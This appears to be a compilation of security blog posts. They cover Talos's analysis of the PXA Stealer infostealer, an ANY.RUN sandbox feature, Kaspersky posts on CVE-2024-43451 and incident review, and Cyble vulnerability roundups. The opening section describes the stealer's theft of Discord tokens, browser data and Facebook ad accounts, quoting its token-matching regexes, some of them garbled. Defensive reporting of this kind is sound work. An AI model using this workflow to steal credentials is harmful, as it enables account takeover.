New PXA Stealer targets government and education sectors for sensitive information
Autofill data stealer function of PXA Stealer.

The stealer also extracts and validates Discord tokens stored in various browsers or Discord applications. It checks for the stored encrypted Discord tokens in the different browser database files and also Discord-specific applications files of Discord, Discord Canary, Lightcord, and Discord PTB on the victim’s machine by searching for strings using regular expression “r”dQw4w9WgXcQ:[^.*[‘(.*)’].*$][^”]*”)”. Once the encrypted tokens are found, it decrypts them with the function “decrypt_dc_tokens()” using the extracted master key that was used to encrypt the tokens from the “Local State” file. Then, it validates the decrypted Discord tokens to check if it is a legitimate Discord token and stores it by associating it with the browser name. Besides searching for the encrypted tokens, the function also looks for unencrypted Discord tokens by searching strings that match the regular expression pattern “[w-]{24}.[w-]{6}.[w-]{27}” for standard tokens and “mfa.[w-]{84}” for multi-factor authentication (MFA) tokens in “.log” and “.ldb” files in the levelDB directory of Discord applications or web browsers where the structured key-value data is stored in levelDB database format. 

New PXA Stealer targets government and education sectors for sensitive information
Discord token stealer function of PXA Stealer. 

The stealer executes another function to extract the user information from the MinSoftware application database. It searches for the database file “db_maxcare.sqlite” file on the victim machine folders, including Desktop, Documents, Downloads, OneDrive and in the logical partitions with the drive letters “D:” and “E:”. Once found, it executes a SQL query to search in the accounts table of the database file and extracts the following data: 

  • uid: User identifier. 
  • pass: User’s password. 
  • fa2: Two-factor authentication data. 
  • email: The user’s email address. 
  • passmail: The email password. 
  • cookie1: Likely a session or authentication cookie. 
  • token: Likely an authentication token. 
  • info: Account information. 
New PXA Stealer targets government and education sectors for sensitive information
MinSoftware application data stealer function of PXA Stealer. 

The stealer also has the functionalities for interacting with Facebook Ads Manager and Graph API using a session authenticated via cookies.  

  • It takes a Facebook cookie and parses it for the session information, such as “c_user”, and attempts to access the token. 
  • Retrieves and formats the details about the user’s ad accounts, such as account status, currency, balance, spend cap, and amount spent.  
  • Gets the list of the user’s Facebook pages, including page name, link, likes, followers, and verification status. 
  • It retrieves a list of groups with administrative users. 
  • It extracts Business Manager IDs associated with the account and retrieves ad account information under each Business Manager. 
  • It uses Facebook data to determine ad account limits for a Business Manager. 
  • It extracts the token from Facebook mobile pages to facilitate authenticates requests. 
New PXA Stealer targets government and education sectors for sensitive information
Facebook data stealer function of PXA Stealer. 

After collecting the targeted victim’s data, including the login data, browser cookies, autofill information, credit card details, Facebook ads account data, cryptocurrency wallet data, Discord token details, and MinSoft application data, the stealer creates a ZIP archive of all the files in the user profile’s temporary folder with the file name format “CountryCode_Victim’s public IP Computername.zip”, with a high compression level of value nine.  

New PXA Stealer targets government and education sectors for sensitive information

While creating the archive and navigating the targeted folders, the stealer excludes some of the directories, including user_data, emoji, tdummy, dumps, webview, update-cache, GPUCache, DawnCache, temp, Code Cache, and Cache. It also attempts to rename each file while adding them to the archive. The archive is exfiltrated to the actor’s Telegram bot. After exfiltrating the victim’s data, the stealer deletes the folders that contained the collected user data.  

New PXA Stealer targets government and education sectors for sensitive information
Exfiltration function of PXA Stealer. 

Coverage 

New PXA Stealer targets government and education sectors for sensitive information

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are listed below: 

Snort2: 64217, 64204, 64216, 64215, 64214, 64213, 64212, 64211, 64210, 64209, 64208, 64207, 64206, 64205, 64203 

Snort3: 301057, 301063, 301062, 301061, 301060, 301059, 64217, 301058   

ClamAV detections are also available for this threat: 

Win.Loader.RustLoader-10036712-0 
Py.Infostealer.PXAStealer-10036718-0 
Py.Infostealer.PXAStealer-10036725-0 
Txt.Tool.PXAStealerInstaller-10036719-0 
Txt.Tool.PXAStealerInstaller-10036724-0 
Txt.Tool.PXAStealerInstaller-10036724-0 
Lnk.Downloader.PXAStealer-10036720-0 
Js.Infostealer.CookieStealer-10036722-0 

Indicators of Compromise 

IOCs for this research can be found in our GitHub repository here

Cisco Talos Blog – ​Read More

Automated Interactivity: Stage 2

Last year, we introduced Automated Interactivity — a feature that simulates user behavior inside the ANY.RUN sandbox to automatically force cyber attack execution. 

The first stage of Automated Interactivity focused on basic user interactions like clicking buttons and completing CAPTCHA challenges. This allowed many analysts to simplify their investigations and streamline the sandbox use via API. 

Today, we are excited to announce the release of the next stage of Automated Interactivity — the Smart Content Analysis mechanism that takes its threat detection capabilities to a new level, delivering better and more in-depth examination of the most complex attacks. 

Here’s what you need to know about this exciting upgrade. 

What is Smart Content Analysis 

Smart content analysis is a mechanism that enables Automated Interactivity to automatically execute malware and phishing attacks by identifying and detonating their key components at each stage of the kill chain. 

It works in three steps: 

  • Content Identification: It scans uploaded samples for notable content, such as URLs and email attachments. 
  • Content Extraction: It extracts the content that needs to be detonated to force the attack to move forward like URLs from QR codes and phishing links that were rewritten by security tools. 
  • Simulated User Interactions: It then simulates user interactions with the extracted content, for instance, by opening URLs in a browser and launching malware payloads inside archives. 

How Smart Content Analysis Adapts to New Threats 

Unlike traditional automated solutions that are limited by pre-programmed algorithms, ANY.RUN’s Smart Content Analysis is built to continuously evolve with the current threat landscape. 

Our team of threat analysts update it with new attack scenarios as soon as they are detected. This ensures nearly instant adaptability to the latest threats and techniques. 

Why Use It 

The upgraded version of Automated Interactivity is an excellent addition to your security workflow, as it:  

  • Improves threat detection for sandbox sessions launched via API  
  • Helps security specialists with analysis by automating complex tasks, providing them with valuable insights and reducing the learning curve  
  • Automates repetitive tasks, reducing the manual effort required for threat analysis and allowing analysts to focus on more strategic activities  
  • Speeds up analysis by quickly identifying and analyzing threats, enabling faster response and remediation  

Try Automated Interactivity and other PRO features
of the ANY.RUN Sandbox for free 



Request 14-day trial


Types of Content It Can Detonate 

Smart Content Analysis can automatically identify and detonate different types of content when moving along the kill chain, including: 

  • URLs inside QR codes: It can automatically extract and open URLs embedded within QR codes, a common tactic for phishing attempts or malware distribution.  
  • Modified Links: Security solutions and spam filters can often rewrite malicious URLs to prevent them from reaching users. This can prevent automated sandboxes from forcing the attack execution beyond the safe link. Smart Content Analysis easily removes the security layer and detonates the original malicious URL. 
  • Multi-Stage Redirects: Many cyber attacks employ complex chains of redirects to obfuscate their final destination. Smart Content Analysis quickly locates the hidden page by bypassing the redirect ones. 
  • Email Attachments: Email attachments are a popular method for attackers to deliver malware. Smart Content Analysis can automatically process and detonate these attachments, as well as their contents. 
  • Payloads within Archives: Modern attacks often utilize archives (ZIP, RAR, etc.) to bundle malicious payloads. Smart Content Analysis executes these payloads with no problem. 

Use Cases for Upgraded Automated Interactivity 

Extracting URL from QR and Solving a CAPTCHA

See a video recording of the analysis performed by Automated Interactivity

Let’s demonstrate how Automated interactivity works using a multi-stage phishing attack that starts with an email: 

The initial email with a PDF attachment opened in the ANY.RUN sandbox 

Step 1: We upload the email file to the ANY.RUN sandbox, switch on Automated Interactivity, and start analysis. 

The pdf file containing a QR code 

Step 2: Automated Interactivity launches the .eml file via Outlook, identifies a PDF attachment, and opens it. 

The static analysis module in ANY.RUN lets you see the link hidden in the QR 

Step 3: After scanning the PDF, it detects a QR code, automatically extracts its embedded URL, and opens it inside a browser. 

The sandbox automatically solves CAPTCHA challenges 

Step 5: The opened page has a CAPTCHA challenge, a common method for evading detection. Thanks to Automated Interactivity, the sandbox successfully solves the CAPTCHA and proceeds to the next stage. 

The final phishing page reached via Automated Interactivity 

Step 6: Once the final phishing page is loaded, the sandbox instantly assigns the “phish-url” tag to the session and marks it with the “malicious activity” label. 

Forcing Formbook Execution from an Archive Attachment 

Automated Interactivity quickly identifies and detonates Formbook inside an archive attached to an email

Automated Interactivity is also excellent for analyzing malware attacks.  

The malicious email with a .zip attachment 

Consider the following analysis session where the feature was used to detonate a sample of Formbook distributed via a phishing email. 

Suricata rule used for detecting Formbook activity 

The service was able to automatically extract the ZIP file found in the email. It then identified a Formbook executable inside the archive and ran it to observe its behavior.


Learn to analyze malware in a sandbox

Learn to analyze cyber threats

See a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis



Extracting Rewritten URL 

Modern email systems are equipped with spam filtering. While it protects users against threats, it complicates the work of security analysts by blocking their access to the actual malicious content that they wish to examine. 

Automated Interactivity bypasses such filters and quickly reaches the resources controlled by the threat actors, saving analysts’ time. 

Here is a sandbox session featuring a blocked phishing URL.

Attack analysis stops at Microsoft’s scam filtering page 

The phishing link inside the analyzed email is rewritten to Microsoft’s domain safelinks[.]protection[.]outlook[.]com and now contains a warning.

While it indicates that the link is malicious, it prevents us from learning more about the threat we’re facing. 

To go beyond the block, we can simply enable Automated Interactivity and rerun the analysis.  

With Automated Interactivity, the attack is executed quickly and with ease 

In the new sandbox session, the rewritten URL is skipped, and all the stages of the attack, including those requiring solving a CAPTCHA, are detonated automatically and as intended. 

Tags provide information on the threat at hand 

This allows us to go further and discover that the attack is carried out by the Storm-1575 threat actor using the DadSec phishing platform, as shown by the corresponding tags. 

What’s Next for Automated Interactivity 

Smart Content Analysis is not the final chapter of Automated Interactivity.  

We are already working on Stage 3 — another mechanism that will further improve the detection rate and make the sandbox even better at automatically detonating attacks.  

Stay tuned for updates! 

Try It Now

See how you can speed up your analysis of the latest cyber attacks with Automated Interactivity. The feature is available to Hunter and Enterprise-plan users. It is also activated by default for all sandbox sessions launched via API. 

To manually enable Automated Interactivity: 

Submit File or URL

1. Navigate to ANY.RUN’s home screen and submit your sample

Enable Automated Interactivity and start analysis

2. Switch on the Automated Interactivity (ML) toggle 

3. Run analysis 

You can get a 14-day free trial of ANY.RUN’s Interactive Sandbox to try Automated Interactivity along with other PRO features like private mode, teamwork, and advanced VM configuration. 

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Request free trial of ANY.RUN’s products →

The post Automated Interactivity: Stage 2 appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

CVE-2024-43451 allows stealing NTLMv2 hash | Kaspersky official blog

With November’s Patch Tuesday Microsoft fixed 89 vulnerabilities in its products — two of which are being actively exploited. One of them — CVE-2024-43451 — is particularly alarming. It allows attackers to gain access to the victim’s NTLMv2 hash. Although it doesn’t have an impressive CVSS 3.1 rating (only 6.5 / 6.0), its exploitation requires minimal interaction from the user, and it exists thanks to the MSHTML engine — the legacy of Internet Explorer — which is theoretically deactivated and no longer used. Nevertheless, all current versions of Windows are affected by this vulnerability.

Why is CVE-2024-43451 so dangerous?

CVE-2024-43451 allows an attacker to create a file that, once delivered to the victim’s computer, will give the attacker the possibility of stealing the NTLMv2 hash. NTLMv2 is a network authentication protocol used in Microsoft Windows environments. Having access to the NTLMv2 hash, an attacker can perform a pass-the-hash attack and attempt to authenticate on the network by posing as a legitimate user — without having their real credentials.

Of course, CVE-2024-43451 alone is not enough for a full-fledged attack — cybercriminals would have to use other vulnerabilities — but someone else’s NTLMv2 hash would make the attacker’s life much easier. At this point in time we have no additional information about scenarios that use CVE-2024-43451 in practice, but the vulnerability description clearly states that the vulnerability is publicly disclosed, and cases of exploitation have been detected in the wild.

What does “minimal interaction” mean?

It is generally assumed that if a user doesn’t open a malicious file — nothing bad can happen. In this case, that’s not true. According to the mini-FAQ in the security update guide advisory on CVE-2024-43451, exploitation may occur even when the user selects the file (single left-click), inspects it (with a right-click), or performs some “action other than opening or executing”.

What other vulnerabilities did Microsoft close in the November patch?

The second vulnerability that is already being exploited in real attacks is CVE-2024-49039. It allows attackers to escape from the AppContainer environment and, as a result, escalate their privileges to a Medium Integrity Level. In addition, there are two more holes that the company states are disclosed, although they’ve not yet been noticed in real attacks. These are CVE-2024-49019 in the Active Directory Certificate Service, which also allows the attacker to elevate privileges, and CVE-2024-49040 in Exchange, thanks to which malicious emails can be displayed with a fake sender address.

In addition, the critical vulnerability CVE-2024-43639, which allows remote code execution in Kerberos, also looks dangerous — though it only affects servers that are configured as a Kerberos Key Distribution Center (KDC) Proxy Protocol server.

How to stay safe?

In order to stay safe, we recommend, firstly, promptly installing updates for critical software (which, of course, includes the operating systems). In addition, it’s worth remembering that most attacks exploiting software vulnerabilities begin via email. Therefore, we recommend equipping all work devices with a reliable security solution, and not forget about protection at the mail gateway level.

Kaspersky official blog – ​Read More

How to prevent company from getting hacked again | Kaspersky official blog

Serious cybersecurity incidents often impact many different parties — including those who don’t typically handle IT or security matters on a daily basis. Of course, the initial response needs to focus on identifying, containing, and recovering from an incident. But once the dust has settled, the time comes for another crucial stage: learning from the experience. What can the incident teach us? How can we improve our chances of preventing similar attacks in the future? These questions are well worth answering — even if the incident caused no significant damage due to an effective response or simply luck.

Involving people

Incident analysis is important for the whole organization. It’s crucial to involve not only IT and security teams but also senior management and IT system stakeholders, as well as any third-party vendors affected by the incident or involved in its response. A productive atmosphere is crucial. It’s important to emphasize that this isn’t a witch hunt (though mistakes will be discussed). Blame-shifting and manipulating information will only distort the picture, hinder analysis, and harm the organization’s long-term security.

Many companies keep incident details under wraps, fearing reputational damage or a repeat attack. While this is completely understandable, and certain details should indeed remain confidential, striving for maximum transparency in response is important. Specifics of an attack and response should be shared, if not with the general public, then at least with a trusted circle of peers in the cybersecurity field who can then help others prevent similar attacks on their organizations.

Detailed incident analysis

Although much incident data is already collected during the response phase, post-incident analysis provides an opportunity for deeper insights. First of all, answer questions like: How and when did the adversary penetrate the organization? What vulnerabilities and technical/organizational weaknesses were exploited? How did the attack unfold? Mapping attacker actions and response efforts on a timeline helps pinpoint when anomalies were detected, how they were identified, what response measures were taken, whether all relevant teams were promptly engaged, and if escalation scenarios were followed.

The answers to these questions should be documented meticulously, referencing factual data like SIEM logs, timestamps for task creation in the task manager, timestamps for emails being sent, and so on. This enables you to build a comprehensive and detailed picture, allowing for collective evaluation of both the speed and effectiveness of each response step.

It’s also necessary to separately assess an incident’s impact on other aspects of the business, such as continuity of operations, data integrity and leaks, financial losses (both direct and indirect), and company reputation. This will help balance the scale and cost of the incident against the scale and cost of measures to strengthen information security.

Identifying strengths and weaknesses

Technical incident reports may seem to contain all the information you need, but in reality they often lack crucial organizational context. A report might state that attackers accessed the system by exploiting a certain vulnerability, and that the organization needs to patch said vulnerability on all servers. However, this superficial analysis overlooks critical questions: How long did this vulnerability remain unpatched after it was disclosed? What other known vulnerabilities exist on the servers? What are the agreed-upon patching SLAs between IT and cybersecurity? Does vulnerability prioritization exist within the company?

Each stage and process affected by the incident deserves this level of scrutiny. This holistic approach allows to assess the security landscape flaws that enabled the incident. It’s important not to focus solely on the negatives: if certain teams responded quickly and effectively or if existing processes/technologies aided in incident detection or mitigation, these aspects should also be analyzed to understand whether this positive experience can be applied elsewhere.

Human error and behavioral factors warrant special attention. What role did they play? Again, the goal isn’t to blame but to identify measures to mitigate or balance the inevitable impact of human factors in the future.

Planning for improvement

This is the most creative and organizationally challenging phase of the incident review. It requires developing effective, realistic steps to address weaknesses within resource constraints. Involving senior management in this process is especially beneficial — as the saying goes, cybersecurity budgets are never approved faster than after a major incident. Several aspects should be considered in the plan:

IT asset map update. The incident may have revealed a lot of new information about how the company’s data is processed and how processes are implemented in general. It’s often necessary to update priorities, reflecting a better understanding of which assets require the most protection.

Detection and response technologies. By analyzing which stages of the attack went undetected by defenders, and which technical measures were missing to stop the attack’s progression, the team can plan to implement additional security tools, such as EDR, SIEM, and NGFW. Sometimes it becomes clear that while the necessary tools seem to be in place, they lack automation (for example, automated response playbooks), or data streams (such as threat intelligence feeds). Or, perhaps, log storage practices facilitated their wholesale deletion by the attackers. Technology enhancements should receive special attention if the analysis showed that defenders spent an excessive amount of time manually searching for compromised hosts or other laborious tasks, lacked access to critical information, or didn’t have the tools for enterprise-wide response.

Processes and policies. Having determined whether the incident occurred due to violations of existing policies or their absence, it’s essential to address this by revisiting the entire chain of events, correcting any identified process deficiencies, and reflecting these corrections in the security policy. Ranging from processes, policies, and regulatory timelines for vulnerability and account management, to incident response playbooks — the revised company processes should ensure the prevention of any similar future incidents.

The overall incident response plan should also be updated and refined based on practical experience. It’s important to clarify which parties were unable to fully participate in the process, and how to organize rapid communication between them to ensure swift decision-making in emergencies.

Proactive measures: technology. Incidents provide an opportunity to take a fresh look at existing practices for account management and patch management. Step-by-step improvements should be planned in areas where the company hasn’t followed best practices: implementing the principle of least privilege and centralized identity management, and prioritizing and systematically addressing key infrastructure vulnerabilities.

Proactive measures: people. Each human error requires corrective measures — targeted training or even drills tailored to individual roles. It’s worth discussing what training is necessary for specific individuals, departments, or the entire organization. A major incident can be a powerful wake-up call, emphasizing the importance of information security and driving engagement in cybersecurity awareness training, even among those who usually downplay its importance.

Following updated processes may be more challenging — requiring a special effort in training. Reminders from management and an incentive program may be necessary to ensure the updated regulations are fully adopted.

Preparing for the next incident

All of the measures listed above will enhance cybersecurity resilience, and readiness for incidents — in theory. But to be sure of the result, it’s worth validating their effectiveness through cybersecurity exercises, penetration testing, or red teaming. These simulations of real cyber-incidents serve different purposes, so which combination is most suitable depends on the organization and the measures taken post-incident.

Implementing all the improvements and updated security measures can be a lengthy, phased process, so regular meetings with all involved parties are necessary to collect feedback, discuss implementation, address challenges, and explore further security enhancements. To ensure these meetings are not mere empty talk, it’s essential to agree on specific metrics and milestones to track progress effectively.

Kaspersky official blog – ​Read More

Australian Cyber Security Center Highlights Key Vulnerabilities Exploited in 2023

Cyber Security

Key Takeaways  

  • Common vulnerabilities in 2023 include Citrix NetScaler, Fortinet FortiOS, and Atlassian Confluence, with attacks involving remote code execution, buffer overflows, and session token leakage. 

  • The advisory was coauthored by international agencies, including ACSC, CISA, the FBI, and cybersecurity bodies from Canada, New Zealand, and the UK, highlighting global collaboration in combating cyber threats. 

  •  Exploited vulnerabilities often stem from code injection, buffer overflows, and improper input validation, emphasizing the need for secure coding practices. 

  • Organizations should implement security by design, adopt secure software development frameworks, and prioritize patch management to protect against known vulnerabilities. 

  • The advisory recommends deploying tools like EDR systems and employing Zero Trust Network Architecture (ZTNA) to detect zero-day exploits and limit lateral movement within networks. 

Overview 

The Australian Cyber Security Center (ACSC) has issued an important cybersecurity advisory detailing a range of vulnerabilities in 2023. The report, which was coauthored by cybersecurity agencies from the United States, Australia, Canada, New Zealand, and the United Kingdom, provides a comprehensive overview of the vulnerabilities most targeted by cybercriminals, including the risks posed by zero-day exploits.  

These advisory aims to inform organizations worldwide about the growing cyber threat landscape and offers guidance to minimize the risks posed by these vulnerabilities. The ACSC’s advisory identifies the most frequently exploited Common Vulnerabilities and Exposures (CVEs) of 2023 and their associated Common Weakness Enumerations (CWEs). 

This security advisory is a collaborative effort from cybersecurity agencies around the world, including the Australian Cyber Security Center (ACSC), the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and cybersecurity agencies from Canada, New Zealand, and the United Kingdom.  

In particular, CISA has worked closely with international partners to monitor, identify, and mitigate common vulnerabilities, reinforcing their shared commitment to securing digital infrastructure. The FBI has also been actively involved in identifying cyber threat actors exploiting these vulnerabilities, especially those targeting critical infrastructure in both the public and private sectors.  

Key Findings: Zero-Day Exploits on the Rise 

One of the most concerning trends identified in the advisory is the increasing exploitation of zero-day vulnerabilities. These vulnerabilities, which are unknown to the software vendor or the public at the time of exploitation, allow attackers to bypass security defenses and gain unauthorized access to systems.  

In 2023, cybercriminals used zero-day vulnerabilities to exploit systems rapidly after their disclosure. Notably, these exploits were used to compromise high-value targets, including organizations in critical sectors such as healthcare, finance, and government. 

The ACSC’s advisory highlights that reducing the lifespan of zero-day exploits can be achieved by improving security lifecycles and ensuring responsible vulnerability disclosure. Both vendors and developers are urged to adopt secure-by-design principles and frameworks like the SP 800-218 Secure Software Development Framework (SSDF) to enhance the security of software from the ground up. 

Top Vulnerabilities Exploited in 2023 

The advisory identifies several CVEs that were routinely exploited in 2023. Among the most frequently targeted vulnerabilities are: 

These vulnerabilities were exploited by a variety of cyber threat actors, including advanced persistent threat (APT) groups and ransomware operators. For instance, CVE-2023-34362, which affects the MOVEit Transfer product, was actively targeted by the CL0P ransomware gang. Similarly, CVE-2023-22515 in Atlassian Confluence was exploited by threat actors to gain unauthorized access to corporate networks, compromising sensitive data

In many cases, these exploits were used to execute remote code, bypass authentication, or escalate privileges within affected systems. These vulnerabilities often result in significant disruption, financial loss, and reputational damage to affected organizations. 

Common Weakness Enumerations (CWEs) 

The advisory also sheds light on the associated Common Weakness Enumerations (CWEs) that underlie many of the vulnerabilities exploited in 2023. For example: 

  • CWE-94: Code injection, which was present in vulnerabilities like CVE-2023-3519 (Citrix NetScaler buffer overflow). 
  • CWE-119: Buffer overflow, as seen in CVE-2023-4966 (Citrix NetScaler session token leakage). 
  • CWE-20: Improper input validation, which was implicated in CVE-2023-22515 (Atlassian Confluence arbitrary code execution). 

By understanding the CWEs associated with these CVEs, organizations can implement more targeted defenses to mitigate the risk of exploitation. Developers are encouraged to adopt practices that prevent these weaknesses from being introduced in the first place, such as using memory-safe languages and conducting regular security testing. 

Recommendations for Vendors, Developers, and End-Users 

In response to these findings, the advisory provides several key recommendations for organizations and developers to enhance their cybersecurity posture and reduce the risk of exploitation: 

  • Vendors are encouraged to integrate security into the development process from the start, using frameworks like SP 800-218 SSDF to guide their efforts. 

  • Developers should ensure that vulnerabilities are disclosed responsibly, including the root causes and associated CWEs, to help the broader community implement effective mitigation measures. 

  • Regularly applying patches is critical to mitigating known vulnerabilities. End-users should also implement centralized patch management systems to streamline the process and ensure that vulnerabilities are addressed promptly. 

  • Security tools like EDR systems are essential for detecting zero-day exploits. Organizations should prioritize their deployment to help identify suspicious activities and mitigate risks before they escalate. 

  • Organizations are urged to have up-to-date incident response plans in place and ensure that system backups are securely stored and regularly tested to recover from potential attacks. 

Conclusion 

The Australian Cyber Security Center (ACSC), in partnership with CISA, the FBI, and other international cybersecurity agencies, is calling on vendors, developers, and end-users to take immediate action to address these vulnerabilities and enhance their overall cybersecurity posture.  

By following the advisory’s recommendations, organizations can reduce their exposure to cyber threats and strengthen their defenses against cyberattacks. The collaboration between global cybersecurity agencies emphasizes the importance of shared intelligence and international cooperation in the fight against cybercrime. 

The post Australian Cyber Security Center Highlights Key Vulnerabilities Exploited in 2023 appeared first on Cyble.

Blog – Cyble – ​Read More

IT Vulnerability Report: Exposed Fortinet Vulnerabilities Approach 1 Million

CybleBlogs

Cyble Research and Intelligence Labs (CRIL) researchers investigated 18 vulnerabilities and 10 dark web exploits in the last week – including an actively exploited Fortinet vulnerability with nearly 1 million exposed assets on the internet.

Other vulnerabilities analyzed by Cyble affect third-party Windows drivers, SharePoint, Qualcomm, Android, QNAP and more.

Here are the vulnerabilities highlighted by Cyble as meriting high-priority attention by security teams.

CVE-2024-23113: FortiOS Format String Vulnerability

CVE-2024-23113 is a critical format string vulnerability affecting Fortinet’s FortiOS, specifically within the FGFM (FortiGate to FortiManager) service. The vulnerability could allow unauthenticated remote code execution (RCE) by malicious actors.

While the vulnerability dates from February, CISA added it to its Known Exploited Vulnerabilities (KEV) catalog last month, and Cyble researchers have seen multiple exploits and proofs of concept (PoC) targeting the vulnerability discussed on the dark web and in cybercrime forums.

Cyble’s ODIN vulnerability search tool has detected 978,000 vulnerable Fortinet instances:

Vulnerable IT assets detected by Cyble

CVE-2024-50550: LiteSpeed Cache plugin for WordPress

Another vulnerability with wide exposure is CVE-2024-50550, a critical privilege escalation vulnerability in LiteSpeed Cache plugin for WordPress, which is installed on over 6 million websites. Cyble honeypot sensors recently detected attacks on a different LiteSpeed vulnerability (CVE-2024-44000) and another WordPress plugin.

Cyble researchers said the new LiteSpeed vulnerability “could be leveraged to access backend databases as well to install arbitrary plugins or sniffers, leading attackers to exfiltrate payment card data and sensitive information of users,” as well as altering web pages.

CVE-2021-41285 and CVE-2020-14979: Windows Drivers

CVE-2021-41285 and CVE-2020-14979 are high-severity vulnerabilities in drivers that could allow attackers to achieve local privilege escalation to NT AUTHORITYSYSTEM in Windows Systems. A newly identified malware called “SteelFox” has been observed mining for cryptocurrency and stealing credit card data by using the “bring your own vulnerable driver” (BYOVD) technique to create a service that runs WinRing0.sys inside vulnerable drivers, leading to privilege escalation.

CVE-2024-38094: Microsoft SharePoint

CVE-2024-38094 is a high-severity remote code execution vulnerability affecting Microsoft SharePoint. Microsoft recently disclosed that the vulnerability is being exploited to gain initial access to corporate networks by attackers. Researchers also observed that attackers are targeting vulnerable SharePoint servers using publicly disclosed SharePoint proof-of-concept exploit code to plant a web shell that they later leverage to gain privileges and pivot into the compromised network.

CVE-2024-43047 and CVE-2024-43093: Android Kernel Components

CVE-2024-43047 is a high-severity use-after-free issue in closed-source Qualcomm components within the Android kernel that can lead to elevated privileges. CVE-2024-43093 is also a high-severity elevation of privilege flaw, impacting the Android Framework component and Google Play system updates, specifically in the Documents UI. Recently Google fixed both of the actively exploited zero-day flaws as part of its November security updates.

CVE-2024-8956 and CVE-2024-8957: PTZ Cameras

CVE-2024-8956 and CVE-2024-8957 impact PTZ cameras, which are extensively used in organizations around the world for applications such as live streaming, security surveillance, and conference automation. The critical vulnerabilities can also be chained by attackers to execute arbitrary OS commands on these devices, as well as access sensitive data such as usernames, password hashes, and device configuration details.

CVE-2024-10443: Synology NAS Devices

CVE-2024-10443 is a critical vulnerability in Synology’s BeeStation and DiskStation NAS devices, specifically within the BeePhotos and SynologyPhotos applications, which are designed to provide user-friendly personal cloud storage solutions. The vulnerability can allow remote attackers to execute arbitrary code. As NAS devices are commonly used to store sensitive data by both home and enterprise customers, Cyble researchers have assessed that attackers could attempt to leverage the vulnerability to breach the systems and steal data.

CVE-2024-50387: QNAP

CVE-2024-50387: This as of yet unclassified vulnerability detailed in a QNAP advisory was revealed at Pwn2Own 2024. It is a critical SQL injection (SQLi) vulnerability impacting QNAP’s SMB Service, which is the vendor’s implementation of the Server Message Block (SMB) protocol within QNAP NAS devices, enabling file sharing and network services across Windows and other operating systems.

Dark Web and Cybercrime Forum Exploits

Here are 7 vulnerabilities and exploits that Cyble researchers observed under active discussion on underground forums and Telegram channels, plus claims of zero-day vulnerabilities for sale in Palo Alto Networks and Microsoft products.

CVE-2024-6778: A high-severity vulnerability affecting the Chromium web browser prior to version 126.0.6478.182. The vulnerability arises from a race condition in the DevTools component. An attacker can convince a user to install such an extension, allowing them to inject arbitrary scripts or HTML into privileged pages, thereby facilitating a sandbox escape.

CVE-2024-46538: A critical cross-site scripting (XSS) vulnerability identified in pfSense version 2.5.2. This vulnerability allows attackers to execute arbitrary web scripts or HTML by injecting a ‘crafted payload’ into the $pconfig variable, specifically through the ‘interfaces_groups_edit.php’ file.

CVE-2024-44193: A vulnerability affecting Apple iTunes for Windows, specifically versions prior to 12.13.3. The vulnerability allows local attackers to potentially elevate their privileges on affected systems, posing significant security risks.

CVE-2024-39205: A critical vulnerability affecting pyload-ng, versions 0.5.0b3.dev85 running under Python 3.11 or below. This vulnerability allows attackers to execute arbitrary code through crafted HTTP requests, which can lead to complete system compromise.

CVE-2024-40711: A critical vulnerability in Veeam Backup & Replication software classified as a deserialization of untrusted data issue. This vulnerability allows unauthenticated remote code execution (RCE), enabling attackers to execute arbitrary code on affected systems without requiring any authentication.

CVE-2024-0311: A cybersecurity vulnerability identified in the Skyhigh Client Proxy, this flaw allows a malicious insider to bypass existing security policies without needing a valid release code, which can potentially lead to unauthorized access to sensitive data or applications.

CVE-2024-20419: The critical vulnerability affecting Cisco’s Smart Software Manager On-Prem (SSM On-Prem) arises from improper validation in the password change functionality, allowing unauthenticated remote attackers to change user passwords without prior knowledge of the existing password.

Cyble researchers also observed zero-day vulnerabilities being offered for sale on dark web forums, including a remote code execution (RCE) vulnerability in Palo Alto’s PAN-OS, and a privilege escalation (LPE) vulnerability in Windows that a threat actor was asking US$200,000 to $400,000 for. Palo Alto issued an advisory stating that it is aware of the PAN-OS claim.

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

  • To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
  • Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
  • Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
  • Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
  • Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
  • Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
